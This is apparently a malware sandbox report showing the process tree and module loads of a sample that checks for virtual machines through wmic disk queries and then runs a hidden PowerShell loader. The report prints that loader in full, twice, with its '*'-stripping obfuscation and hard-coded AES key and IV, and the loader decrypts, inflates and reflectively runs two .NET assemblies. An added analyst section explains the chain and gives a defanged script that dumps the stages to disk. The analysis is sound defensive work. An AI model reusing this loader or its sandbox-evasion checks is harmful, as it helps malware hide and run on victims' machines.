'$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
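The long `cmd.exe /S /D /c" echo function ...` command line above is the complete second-stage loader: it reads the .bat dropped at `C:\Windows\$nya-onimai3\$nya-Loli.bat`, takes the first line beginning with `:: ` (a batch comment, so cmd.exe skips it when running the same file), splits it on `\`, and for each half does Base64 decode, AES-256-CBC decrypt with the hard-coded key and IV, gzip inflate, then `[Reflection.Assembly]::Load` and `EntryPoint.Invoke`. The `'...'.Replace('*', '')` wrappers only keep the type names out of the visible script and out of simple string matches. The PowerShell below is an added example, not code from the report or from the sample: it repeats the decrypt and inflate chain with the key and IV taken from the command line, but writes both stages to disk for static analysis instead of loading them. The `$OutDir` location and the `stageN.bin` file names are assumptions; run it only in an isolated analysis VM, because the output is the live payload.

```powershell
# Added example (not part of the sandbox report or the malware): a defanged
# re-implementation of the loader's decryption chain that dumps the recovered
# .NET assemblies instead of calling Assembly.Load / EntryPoint.Invoke.
# Key, IV and the ':: ' / '\' carrier format are copied from the command line
# in the report; the output directory and file names are assumptions.
param(
    [string]$BatPath = 'C:\Windows\$nya-onimai3\$nya-Loli.bat',   # carrier file named in the report
    [string]$OutDir  = "$env:TEMP\nya-stages"                      # assumed dump location
)

$Key = [Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU=')  # 32 bytes -> AES-256
$IV  = [Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg==')                      # 16 bytes

function Unprotect-Stage {
    param([byte[]]$Blob)
    # Same primitive as the loader's OEJrN(): AES-CBC, PKCS7 padding, static key/IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $dec = $aes.CreateDecryptor()
        try { $plain = $dec.TransformFinalBlock($Blob, 0, $Blob.Length) } finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
    # Same as the loader's pEnJN(): gzip-inflate the decrypted buffer.
    $src = New-Object System.IO.MemoryStream(,$plain)
    $dst = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($src, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($dst) } finally { $gz.Dispose(); $src.Dispose() }
    $bytes = $dst.ToArray()
    $dst.Dispose()
    return $bytes
}

# -LiteralPath matters: the directory name contains '$', which a double-quoted
# or wildcard-expanded path would mangle.
$carrier = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $carrier) { throw "no ':: ' payload line found in $BatPath" }
$parts = $carrier.Substring(3).Split('\')
if ($parts.Count -lt 2) { throw "expected two '\'-separated blobs, found $($parts.Count)" }

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
for ($i = 0; $i -lt 2; $i++) {
    $pe = Unprotect-Stage ([Convert]::FromBase64String($parts[$i]))
    # Both stages are handed to Assembly.Load by the loader, so each should start with 'MZ'.
    $isPe = ($pe.Length -gt 2 -and $pe[0] -eq 0x4D -and $pe[1] -eq 0x5A)
    $dest = Join-Path $OutDir ("stage{0}.bin" -f $i)
    [System.IO.File]::WriteAllBytes($dest, $pe)
    $sha = (Get-FileHash -LiteralPath $dest -Algorithm SHA256).Hash
    "stage$i : $($pe.Length) bytes, MZ header: $isPe, SHA256 $sha -> $dest"
}
```

Stage 0 is invoked by the loader with no arguments and stage 1 with a one-element `string[]` (the `(,[string[]] (''))` at the end of the command line), which is worth knowing when the dumps are opened in a .NET decompiler. Because the key and IV are static, the same script recovers the payload from any carrier built with this key pair; if the `:: ` line is missing or a blob fails to inflate, the .bat on disk has been replaced or the key has changed.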
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
